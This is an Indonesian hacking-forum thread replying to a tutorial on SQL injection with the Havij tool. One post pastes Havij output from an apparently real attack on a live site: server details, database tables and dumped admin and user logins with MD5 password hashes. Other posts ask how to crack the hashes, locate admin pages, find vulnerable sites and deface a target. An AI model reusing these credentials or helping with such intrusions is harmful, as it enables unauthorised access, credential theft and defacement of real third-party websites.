[Tutorial] SQL Injection menggunakan Havij Vers 1.10

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
ayong33
Posts: 6
Joined: Tue Aug 09, 2011 9:35 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by ayong33 » Sat Aug 13, 2011 7:21 am

kok gak bsa gan hash md5.nya...
ad cara laen gak...?

User avatar
un4m3d
Posts: 4
Joined: Thu Aug 11, 2011 7:40 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by un4m3d » Sat Aug 13, 2011 1:13 pm

kk ..
find admin nya kok gag nemu jg yah, padahal aku udah dapet yg vurn neh
dan dapet semua akses masuknya termasuk login user + pass 'na
Host IP: ***.**.***.**
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.2.10-2ubuntu6
Keyword Found: p><b
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 5
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: cecial
Count(table_name) of information_schema.tables Where table_schema=0x63656369616C is 18
Tables found: tbl_arquivos,tbl_banners,tbl_categoria,tbl_email,tbl_emails,tbl_fotogaleria,tbl_imagens,tbl_mala_direta,tbl_menu,tbl_menu_adm,tbl_newsletter,tbl_noticias,tbl_paginas,tbl_status,tbl_submenu,tbl_submenu_adm,tbl_tipos,tbl_usuarios
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F656D61696C is 2
Columns found: id_email,email
Count(*) of cecial.tbl_email is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Canceling...
Job Canceled!
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F6D656E755F61646D is 4
Columns found: id_menu_adm,item_menu_adm,link_menu_adm,nivel_acesso
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F7573756172696F73 is 6
Columns found: id_usuario,nome_usuario,email_usuario,nivel_acesso,login_usuario,senha_usuario
Count(*) of cecial.tbl_usuarios is 3
Data Found: login_usuario=admin
Data Found: email_usuario=[email protected]
Data Found: nome_usuario=Administrador
Data Found: senha_usuario=87ed1dc579ed6a53528cea33d75eaed5
Data Found: nivel_acesso=1
Data Found: id_usuario=1
Data Found: login_usuario=jornalista
Data Found: email_usuario=[email protected]
Data Found: nome_usuario=Jornalista
Data Found: senha_usuario=3605fb0da091e9069f6da957932f1789
Data Found: nivel_acesso=2
Data Found: id_usuario=2
Data Found: login_usuario=hamilton
Data Found: email_usuario=[email protected]
Data Found: nome_usuario=Hamilton
Data Found: senha_usuario=b3edb2df76bc59cafe10222b9e9b4223
Data Found: nivel_acesso=1
Data Found: id_usuario=3
  • learn...???
is not enough !!!

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by poni » Mon Aug 15, 2011 12:44 am

Kadang admin mengubah nama page login supaya tidak gampang ditemukan oleh pihak luar.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

detta3690
Posts: 1
Joined: Fri Aug 19, 2011 11:20 pm

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by detta3690 » Sun Aug 21, 2011 6:35 am

om mau tanya dong.. kalo webnya gini http://site.com/?
gmn? kan ga ada index php atau semacamnya..ga bisa di analyze dong..:(

veronochi
Posts: 5
Joined: Tue Aug 30, 2011 11:01 pm
Contact:

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by veronochi » Tue Aug 30, 2011 11:16 pm

bagus om tutornya nie...

sayang ya havij untuk windows coba ada versi linuxnya keren dah...
Hanya Manusia Biasa

djisamsoe
Posts: 22
Joined: Tue Sep 27, 2011 7:42 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by djisamsoe » Thu Sep 29, 2011 10:18 am

mantabs..bro :idea:

kalil45
Posts: 1
Joined: Mon Oct 10, 2011 8:37 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by kalil45 » Wed Oct 12, 2011 8:27 am

gan ane gak bisa crack MD5 nya untuk menjadi paswor,,
bantuan dan pencerahan di tunggu

Tobyazx77x
Posts: 1
Joined: Fri Oct 21, 2011 2:42 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by Tobyazx77x » Fri Oct 21, 2011 10:45 pm

om poni saya mau nanya nih kan saya mau nge deface web lain udah ketemu admin login nya
tapi cara nyari username and pass nya gimana?
maaf kalo ganggu :)

M4d3X
Posts: 4
Joined: Wed Apr 13, 2011 1:11 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by M4d3X » Mon Oct 24, 2011 7:20 pm

masih bisa nggk oms?

ladade
Posts: 36
Joined: Thu Nov 17, 2011 10:43 pm
Location: denpasar
Contact:

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Post by ladade » Fri Nov 18, 2011 12:08 am

klo nyari" vulnerablenya gmana caranya?
sloganku GO A HACK

Post Reply

Return to “Web Hacking”